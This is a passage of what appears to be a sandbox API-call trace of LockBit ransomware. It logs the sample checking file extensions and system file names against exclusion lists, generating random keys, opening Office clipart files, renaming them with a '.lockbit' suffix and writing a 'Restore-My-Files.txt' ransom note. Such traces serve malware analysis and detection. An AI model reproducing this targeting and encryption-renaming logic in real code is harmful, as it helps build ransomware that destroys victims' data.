-1 [0103.267] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="ntldr", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04195_.WMF") returned 1 [0103.268] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04195_.WMF") returned 1 [0103.268] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.268] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned=".WMF" [0103.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.268] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.268] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.269] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.270] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.270] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.270] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.lockbit") returned 72 [0103.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13b4 [0103.270] CreateIoCompletionPort (FileHandle=0x13b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.270] malloc (_Size=0x40068) returned 0x3e70008 [0103.271] GetFileSizeEx (in: hFile=0x13b4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4612) returned 1 [0103.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.272] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.277] malloc (_Size=0xa6) returned 0x77d800 [0103.277] NtSetInformationFile (FileHandle=0x13b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.278] free (_Block=0x77d800) [0103.278] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.278] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.278] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04196_.WMF", cAlternateFileName="")) returned 1 [0103.278] lstrcmpiW (lpString1=".", lpString2="AN04196_.WMF") returned -1 [0103.278] lstrcmpiW (lpString1="..", lpString2="AN04196_.WMF") returned -1 [0103.278] PathFindExtensionW (pszPath="AN04196_.WMF") returned=".WMF" [0103.278] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.278] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.278] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.279] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.279] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.280] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="ntldr", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04196_.WMF") returned 1 [0103.280] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04196_.WMF") returned 1 [0103.281] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.281] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned=".WMF" [0103.281] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.281] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.281] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.282] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.282] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.282] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.282] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.282] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.lockbit") returned 72 [0103.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0103.282] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.282] malloc (_Size=0x40068) returned 0x3ef0008 [0103.282] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3144) returned 1 [0103.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0103.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0103.284] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0103.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.290] malloc (_Size=0xa6) returned 0x77d800 [0103.290] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.291] free (_Block=0x77d800) [0103.291] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.291] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.291] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1df4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04206_.WMF", cAlternateFileName="")) returned 1 [0103.291] lstrcmpiW (lpString1=".", lpString2="AN04206_.WMF") returned -1 [0103.291] lstrcmpiW (lpString1="..", lpString2="AN04206_.WMF") returned -1 [0103.291] PathFindExtensionW (pszPath="AN04206_.WMF") returned=".WMF" [0103.291] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.292] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.293] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.293] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="ntldr", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04206_.WMF") returned 1 [0103.294] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04206_.WMF") returned 1 [0103.294] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.294] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned=".WMF" [0103.294] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.294] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.294] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.295] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.295] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.lockbit") returned 72 [0103.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0103.304] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.304] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.304] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7668) returned 1 [0103.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.305] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.314] malloc (_Size=0xa6) returned 0x77d800 [0103.314] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.314] free (_Block=0x77d800) [0103.314] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 